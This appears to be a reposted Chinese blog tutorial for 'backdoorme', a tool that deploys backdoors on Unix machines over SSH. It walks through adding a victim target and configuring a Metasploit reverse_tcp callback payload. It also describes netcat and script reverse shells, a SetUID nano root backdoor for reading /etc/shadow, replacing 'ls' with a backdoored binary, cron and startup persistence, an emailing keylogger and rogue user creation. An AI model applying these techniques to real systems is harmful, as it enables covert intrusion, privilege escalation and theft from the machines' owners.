backdoorme—-unix系后门工具

Posted 黑白之道

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了backdoorme—-unix系后门工具相关的知识,希望对你有一定的参考价值。


Backdoorme是一个集成了大量类UNIX系后门的后门工具,其使用了类似metasploit的具有高度扩展性的接口。


backdoorme依赖于与目标机器的ssh连接或者ssh证书,它将通过这个连接或证书传输后门并部署在目标机器上。不过,未来在工具扩展后,也会去掉这种依赖。(如果不知道如何设置ssh,请移步这里:https://help.ubuntu.com/community/SSH/OpenSSH/Configuring )


用法:


backdoorme由大量的内置后门、模块和辅助模块组成。内置后门是用来创建和部署特定后门的特殊组件,比如netcat后门、msfvenom后门。模块可以使用在任何一个后门上,可以让后门更有效、隐秘或者更容易地植入。辅助模块的作用主要是维持权限。


使用backdoorme之前,需要使用dependencies.py检测和下载依赖模块:



$ python dependencies.py


启动backdoorme:


  1. $ python master.py

  2.   ___           __      __              __  ___

  3.  / _ )___ _____/ /_____/ /__  ___  ____/  |/  /__

  4. / _  / _ `/ __/  '_/ _  / _ \/ _ \/ __/ /|_/ / -_)

  5. /____/\_,_/\__/_/\_\\_,_/\___/\___/_/ /_/  /_/\__/

  6. Welcome to BackdoorMe, a powerful backdooring utility. Type "help" to see the list of available commands.

  7. Type "addtarget" to set a target, and "open" to open an SSH connection to that target.

  8. Using local IP of 10.1.0.1.

  9. >>


添加一个目标:


  1. >> addtarget

  2. Target Hostname: 10.1.0.2

  3. Username: victim

  4. Password: password123

  5. + Target 1 Set!

  6. >>


添加内置后门:


使用”use“命令利用后门:


  1. >> use metasploit

  2. + Using current target 1.

  3. + Using Metasploit backdoor...

  4. (msf) >>


然后就可以为后门设置相关的参数了:


用”show options“命令或”help“命令查看可以设置的参数,并用”set“参数设置参数值。


  1. (msf) >> show options

  2. Backdoor options:

  3. Option      Value       Description     Required

  4. ------      -----       -----------     --------

  5. name        initd       name of the backdoor        False

  6. format      elf     format to write the backdoor to     True

  7. lhost       10.1.0.1        local IP to connect back to     True

  8. encoder     none        encoder to use for the backdoor     False

  9. lport       4444        local port to connect back on       True

  10. payload     linux/x86/meterpreter/reverse_tcp       payload to deploy in backdoor       True

  11. (msf) >> set name apache

  12. + name => apache

  13. (msf) >> show options

  14. Backdoor options:

  15. Option      Value       Description     Required

  16. ------      -----       -----------     --------

  17. name        apache      name of the backdoor        False

  18. ...


目前主要支持如下的参数:

  • Bash

    • 用简单的bash脚本连接特定的ip、端口组合并且将输出用管道传入bash

  • Bash2 (需要更多依赖)

    • 此版本比第一个更加轻量,不会在客户端提示输入密码

  • Metasploit

    • 调用msfvenom在目标上生成一个reverse_tcp 二进制文件,然后运行并连接meterpreter shell

  • Netcat

    • 通过netcat与目标/bin/sh建立一个标准的输入输出管道,提供一个交互shell

  • Netcat-traditional

    • 利用netcat的-e参数建立一个反向shell

  • Perl

    • 建立一个perl脚本,将输出重定向到bash,并将自己的进程重命名使其看起来更加隐秘

  • php (不会自动安装web服务,但是会使用web模块)

    • 运行一个php后门,重定向输出到bash

  • Pupy

    • 利用n1nj4sec的Pupy后门,可以参考这里https://github.com/n1nj4sec/pupy

  • Python

    • 用一段很短的python脚本执行命令并将命令返回给使用者

  • SetUID

    • SetUID后门的原理是:当用户拥有root权限的时候,修改二进制文件的SetUID值。当用户没有root权限,依然可以运行该二进制文件获得root权限。此后门会默认地修改nano的SetUID值,所以一旦没有了root权限,以普通用户身份登录进来后,可以以root身份运行nano(“nano /etc/shadow”)

  • SSH Key

    • 创建一个RSA密钥,并复制到目标上,使其支持无密码连接

  • Web (和上面的php后门不同,上面的是php脚本的后门,非web后门)

    • 传输一个web server到目标,通过web server上传一个msfvenom的reverse_tcp 后门并连接到目标

模块:

使用”add”命令可以给后门添加模块,每个后门都可以添加一些模块使其更加有效。

 
   
   
 
  1. (msf) >> add poison

  2. + Poison module added

每个模块都有自定义的参数,添加模块后再次使用”help”命令,便可以看到其选项。

 
   
   
 
  1. (msf) >> help

  2. ...

  3. Poison module options:

  4. Option      Value       Description     Required

  5. ------      -----       -----------     --------

  6. name        ls        name of command to poison     False

  7. location /bin       where to put poisoned files into        False

现在主要支持如下参数:


  • Poison

    • 在目标机上进行投毒——编译后门整合到系统命令中

    • 比如,如果投毒目标是”ls”,它会用编译好的二进制文件替代”ls”,当用户运行ls命令的时候,同时也启动了后门。可以使用户更频繁地启动后门。

  • Cron

    • 把后门添加到用户的定时任务中,以固定的频率启动后门

  • Web

    • 设置web服务器并放置一个包含后门的web页面

    • 访问网站即可触发后门

  • Keylogger

    • 传输一个键盘记录器到目标并启动

    • 可以设置参数使其每小时都通过email将结果发送回来

  • User

    • 给目标添加一个新用户

  • Startup

    • 将后门路径添加到bashrc和初始化文件中

    辅助模块:

    为了维持权限,也许你会希望在目标上安装一些服务,你可以使用”apply”命令来应用辅助模块。

      
        
        
      
    1. >> apply user

    2. + User Auxiliary Module added.

    辅助模块也支持模块的用法,可以让它们变得更加隐秘或容易触发,比如:

      
        
        
      
    1. >> (user) add startup

    2. + Startup Module added.

    主要支持的应用有:

    • User

      • 向目标添加一个新用户

    • Web

      • 在目标上安装一个apache server

    • SimpleHTTP

      • 在目标上安装python的 SimpleHTTP server


    目标:

    backdoorme可以同时支持多个目标,由序号区别管理。”current”目标为当前目标,每次新建一个目标后,新建目标就会成为当前目标。直接在命令后面添加目标序号便可以手动切换目标,比如”use metasploit 2“会将当前目标切换到metasploit后门的第二个目标。

    文章出处:黑客工具箱

你可能喜欢




以上是关于backdoorme—-unix系后门工具的主要内容,如果未能解决你的问题,请参考以下文章

短小精干的Unix类后门Tiny shell的使用与分析

7.多关联双亲染色体片段代换系(CSSL)群体的代谢组分析

黑客中说的后门啥意思

网页后门的网页后门和网页挂马

给开源编译器插入后门

混淆技术很强!恶意软件Siloscape可在Kubernetes集群中植入后门